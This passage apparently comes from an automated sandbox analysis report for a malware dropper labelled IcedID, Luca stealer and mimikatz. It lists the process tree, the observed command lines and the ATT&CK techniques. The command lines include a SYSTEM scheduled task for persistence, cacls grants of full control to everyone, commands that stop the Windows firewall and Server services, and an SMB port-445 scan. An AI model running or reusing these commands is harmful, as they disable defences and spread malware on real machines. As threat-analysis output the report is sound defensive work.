      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      - System Location Discovery: System Language Discovery

    - C:\Windows\SysWOW64\schtasks.exe (PID 3356)
      Command line: schtasks /create /sc minute /mo 1 /tn "WwANsvc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F"
      - System Location Discovery: System Language Discovery
      - Scheduled Task/Job: Scheduled Task

  - C:\Windows\SysWOW64\cmd.exe (PID 1020)
    Command line: cmd /c net stop SharedAccess
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    - C:\Windows\SysWOW64\net.exe (PID 3500)
      Command line: net stop SharedAccess
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      - C:\Windows\SysWOW64\net1.exe (PID 3004)
        Command line: C:\Windows\system32\net1 stop SharedAccess
        - System Location Discovery: System Language Discovery

  - C:\Windows\SysWOW64\cmd.exe (PID 688)
    Command line: cmd /c net stop MpsSvc
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    - C:\Windows\SysWOW64\net.exe (PID 5032)
      Command line: net stop MpsSvc
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      - C:\Windows\SysWOW64\net1.exe (PID 1460)
        Command line: C:\Windows\system32\net1 stop MpsSvc
        - System Location Discovery: System Language Discovery

  - C:\Windows\SysWOW64\cmd.exe (PID 5100)
    Command line: cmd /c net stop LanmanServer
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    - C:\Windows\SysWOW64\net.exe (PID 2596)
      Command line: net stop LanmanServer
      - System Location Discovery: System Language Discovery

      - C:\Windows\SysWOW64\net1.exe (PID 116)
        Command line: C:\Windows\system32\net1 stop LanmanServer
        - System Location Discovery: System Language Discovery

  - C:\Windows\SysWOW64\cmd.exe (PID 1240)
    Command line: cmd /c sc config LanmanServer start= disabled
    - System Location Discovery: System Language Discovery

    - C:\Windows\SysWOW64\sc.exe (PID 548)
      Command line: sc config LanmanServer start= disabled
      - Launches sc.exe
      - System Location Discovery: System Language Discovery

  - C:\Windows\TEMP\Networks\taskmgr.exe (PID 1424)
    Command line: C:\Windows\TEMP\Networks\taskmgr.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

  - C:\Windows\TEMP\wimnat.exe (PID 5116)
    Command line: C:\Windows\TEMP\wimnat.exe
    - Executes dropped EXE
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx

  - C:\Windows\SysWOW64\cmd.exe (PID 4380)
    Command line: cmd.exe /c C:\Windows\InfusedAppe\Priess\scan.bat
    - System Location Discovery: System Language Discovery

    - C:\Windows\InfusedAppe\Priess\GoogleCdoeUpdate.exe (PID 4876)
      Command line: GoogleCdoeUpdate.exe tcp 10.127.0.1 10.127.255.255 445 512 /save
      - Executes dropped EXE
      - Drops file in Windows directory
      - System Location Discovery: System Language Discovery

- C:\Windows\SysWOW64\xchlyg.exe (PID 3048)
  Command line: C:\Windows\SysWOW64\xchlyg.exe
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx

- C:\Windows\system32\cmd.EXE (PID 4216)
  Command line: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F

  - C:\Windows\system32\cmd.exe (PID 2360)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"

  - C:\Windows\system32\cacls.exe (PID 1444)
    Command line: cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F

- C:\Windows\system32\cmd.EXE (PID 3712)
  Command line: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe

  - C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe (PID 4464)
    Command line: C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx

- C:\Windows\system32\cmd.EXE (PID 4944)
  Command line: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe /p everyone:F

  - C:\Windows\system32\cmd.exe (PID 3732)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"

  - C:\Windows\system32\cacls.exe (PID 4004)
    Command line: cacls C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe /p everyone:F

- C:\Windows\system32\cmd.EXE (PID 2396)
  Command line: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F

  - C:\Windows\system32\cmd.exe (PID 5372)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"

  - C:\Windows\system32\cacls.exe (PID 5368)
    Command line: cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F

- C:\Windows\system32\cmd.EXE (PID 5304)
  Command line: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe

  - C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe (PID 5808)
    Command line: C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx

- C:\Windows\system32\cmd.EXE (PID 1980)
  Command line: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe /p everyone:F

  - C:\Windows\system32\cmd.exe (PID 6016)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"

  - C:\Windows\system32\cacls.exe (PID 5452)
    Command line: cacls C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe /p everyone:F
Network
MITRE ATT&CK Enterprise v15
Execution
- Scheduled Task/Job (1): Scheduled Task (1)
- System Services (1): Service Execution (1)
Persistence
- Create or Modify System Process (1): Windows Service (1)
- Event Triggered Execution (1): Image File Execution Options Injection (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
- Create or Modify System Process (1): Windows Service (1)
- Event Triggered Execution (1): Image File Execution Options Injection (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Downloads